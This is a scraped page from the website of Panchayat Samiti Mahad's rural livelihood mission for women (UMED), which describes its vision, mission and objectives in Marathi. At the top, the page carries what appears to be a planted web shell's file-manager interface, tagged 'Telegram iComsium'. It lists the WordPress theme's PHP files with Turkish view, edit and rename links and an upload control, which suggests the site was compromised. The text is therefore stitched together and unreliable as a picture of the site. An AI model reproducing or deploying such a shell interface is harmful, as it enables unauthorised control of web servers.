Telegram iComsium Current root: C:\inetpub\wwwroot\bhmahad\wp-content\themes\astra
Current path: C:\\\\\\\\inetpub\\\\\\\\wwwroot\\\\\\\\bhmahad\\\\\\\\wp-content\\\\\\\\themes\\\\\\\\astra/inc
..
addons
admin-functions.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
assets
blog
builder
class-astra-after-setup-theme.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
class-astra-dynamic-css.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
class-astra-extended-base-dynamic-css.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
class-astra-global-palette.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
class-astra-loop.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
class-astra-memory-limit-notice.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
class-astra-mobile-header.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
compatibility
core
customizer
dynamic-css
extras.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
google-fonts.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
index.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
lib
markup-extras.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
metabox
modules
schema
template-parts.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
template-tags.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
theme-update
w-org-version.php | [Göster] | [Düzenle] | [Yeniden Adlandır]
widgets.php | [Göster] | [Düzenle] | [Yeniden Adlandır]

Dosya Yükle

जीवनोन्नती अभियान – पंचायत समिती – महाड

पंचायत समिती – महाड

उमेद – महाराष्ट्र राज्य ग्रामीण जीवनोन्नती अभियान अंतर्गत तालुका अभियान व्यवस्थापन कक्ष, महाड मार्फत ग्रामीण भागातील महिलांच्या सामाजिक व आर्थिक सशक्तीकरणासाठी कार्य करित आहे, ग्रामीण भागातील गरजू, गरीब, जोखीमप्रवरण कुटुंबाना समृद्ध, आत्म सन्मानाने जीवन जगता यावेळी यासाठी पोषक वातावरण निर्मिती करण्याचे काम केले जात आहे. याकरिता सर्वसमावेशक, लोकशाही तत्वावर आधारित, स्वयंचलित स्वयं सहाय्यता समूह, गाव संघ, प्रभागसंघ या समुदाय संस्थाची निर्मिती करुन ग्रामीण गरीब कुटुंबांच्या सर्वांगीण विकासाकरिता विविध उपक्रम राबविले जात आहेत.
आमच्या कार्याचा केंद्रबिंदू म्हणजे – “ग्रामीण महिला, तिचे कुटुंब आणि तिचा सर्वांगीण विकास”
यासाठी कौशल्य प्रशिक्षण, वित्तीय साक्षरता, रोजगार निर्मिती, उद्योजकता विकास, समुदाय सक्षमीकरण, जेंडर समानता, सामाजिक सुरक्षा हक्क या क्षेत्रात विविध प्रकल्प यशस्वीपणे राबविनेचे काम सातत्याने सुरु आहे.

या संकेतस्थळाच्या माध्यमातून तालुका स्तरावर होणाऱ्या सर्व उपक्रमांची माहिती, प्रशिक्षण कार्यक्रम, यशोगाथा, शासन निर्णय, तसेच समुदाय संस्थांसाठी उपयुक्त दुवे, महिलांनी निर्मिती केलेल्या उत्पादन विषयीची माहिती सर्वांना सहज उपलब्ध करून देण्याचा आमचा उद्देश आहे.

दृष्टी (Vision) :
स्वावलंबी, आत्मनिर्भर व सशक्त ग्रामीण महिला निर्माण करणे.

ध्येय (Mission) :
समुदाय आधारित संस्थांद्वारे शाश्वत जीवनोन्नती साध्य करणे.

उद्दिष्ट :
1. गरीब जोखीम प्रवरणता कुटुंबाचा समावेश करणे.
2. सर्वसमावेशक लोकशाही आधारित गरिबांच्या संस्थाची उभारणी करुन क्षमता बांधणी करणे.
3. वित्तीय सेवा व शासकीय सेवा लाभ मिळवून देणे.
4. सामाजिक सुरक्षा निर्माण करणे.
5. शाश्वत उपजीविका निर्माण करणे.
6. कृतीसंगमच्या माध्यमातून विविध योजना सोबत समन्वय साधुन लाभ मिळून देणे.
7. गरिबांच्या आयुष्यात समृद्धी निर्माण करणे.

Scroll to Top